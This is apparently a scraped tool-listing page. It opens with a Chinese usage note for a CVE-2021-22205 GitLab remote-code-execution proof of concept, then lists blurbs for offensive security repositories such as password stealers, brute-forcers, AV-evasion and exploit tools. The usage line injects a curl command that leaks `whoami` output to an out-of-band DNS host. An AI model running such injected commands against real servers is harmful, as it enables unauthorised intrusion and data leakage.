影响版本:
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
RedTeam Toolkit Note: Only legal activities should be conducted with this project. Red Team Toolkit is an Open-Source Django Offensive Web-App contain
😭 WSOB (CVE-2022-29464) 😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. CVE-2022-29464 details:
hAFL2 hAFL2 is a kAFL-based hypervisor fuzzer. It is the first open-source fuzzer which is able to target hypervisors natively (including Hyper-V), as
Free HTTP Proxy List 🌍 It is a lightweight project that hourly scrapes lots of
WELCOME TO LAYLA Layla is a python script that automatically performs recon on a
Parental Control Application LittleBrother Overview LittleBrother is a simple parental control application monitoring specific processes (read "games"
Qbot-Strings-Decrypter An IDA pro python script to decrypt Qbot malware strings.
HexCopy IDA plugin for quickly copying disassembly as encoded hex bytes. This whole plugin just saves you two extra clicks... but if you are frequentl
The Recon-ng Framework Recon-ng content now available on Pluralsight! Recon-ng is a full-featured reconnaissance framework designed with the goal of p
Insta-crack This is a instagram brute force tool that uses tor as its proxy connections, keep in mind that you should not do anything illegal with thi
QFTools Python lib to automate basic QFT calculations like Wick-contractions. Features Wick contractions for real scalar fields Wick contractions for
Repo for "The Crown: Exploratory Analysis of Nim Malware" DEF CON 615 talk
PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket
hexxus Hexxus is a fast hash cracking tool which checks more than 30 thousand passwords in under 4 seconds and can crack the following types bcrypt sh
CVE-2021-44228-log4j discovery (Download the MKP package) This plugin discovers vulnerable files for the CVE-2021-44228-log4j issue. To discover this
StarUML_cracker Usage On Linux Clone the repo. git clone https://github.com/mana
HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.
Chromepass - Hacking Chrome Saved Passwords and Cookies View Demo · Report Bug · Request Feature Table of Contents About the Project AV Detection Gett
NSGenCS What Is? An extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows. Installation Requirements Currently
QHack 2022 Problems from Coding Challenges 2022. Rules and how it works To test
382 Jan 01, 2023
25 Oct 14, 2022
115 Dec 07, 2022
142 Jan 05, 2023
68 Jan 04, 2023
40 Dec 21, 2022
6 Sep 01, 2022
46 Oct 30, 2022
2.4k Jan 07, 2023
3 Jan 28, 2022
2 Aug 21, 2022
43 Dec 03, 2022
140 Dec 27, 2022
17 Apr 05, 2022
4 Jan 08, 2022
9 Jun 20, 2022
5 May 10, 2022
622 Jan 04, 2023
123 Dec 19, 2022
1 Feb 14, 2022